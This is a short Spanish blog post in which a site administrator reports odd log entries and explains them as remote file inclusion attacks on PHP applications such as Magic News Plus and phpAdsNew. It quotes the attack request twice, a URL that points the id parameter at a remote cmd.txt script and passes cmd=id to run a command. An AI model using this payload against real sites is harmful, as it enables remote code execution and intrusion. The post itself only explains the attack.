Mientras revisaba los logs del sitio encontré unas extrañas peticiones.

En la url del sitio vienen entradas en donde se modifica la variable de id y se cambia por una página web y se agrega otro campo que se llama cmd con el nombre de la variable.

De la siguiente forma:

http://{url}id=http://www.canalproxysx.org/cmd/cmd.txt?&cmd=id

La pagina de Internet ahora no existe. Una rápida búsqueda en google me dice que existen varios sitios con este tipo de entras extrañas y sin sentido en sus logs.

Un poco mas de investigación me arrojo que es lo que viene a ser una file intrusion.

Parece que este tipo de ataque en particular esta orientado a aplicaciones php muy especificas como Magic News Plus o phpAdsNew.

Al recibir el siguiente request

{myweb…}id=http://www.canalproxysx.org/cmd/cmd.txt?&cmd=id

lo que hacen es cargar el archivo cmd.txt y luego lo ejecutan con la acción cmd=id.

Estas aplicaciones tienen esta falla de seguridad ya que permiten ejecutar scripts externos de forma maliciosa.

Popularidad: 30%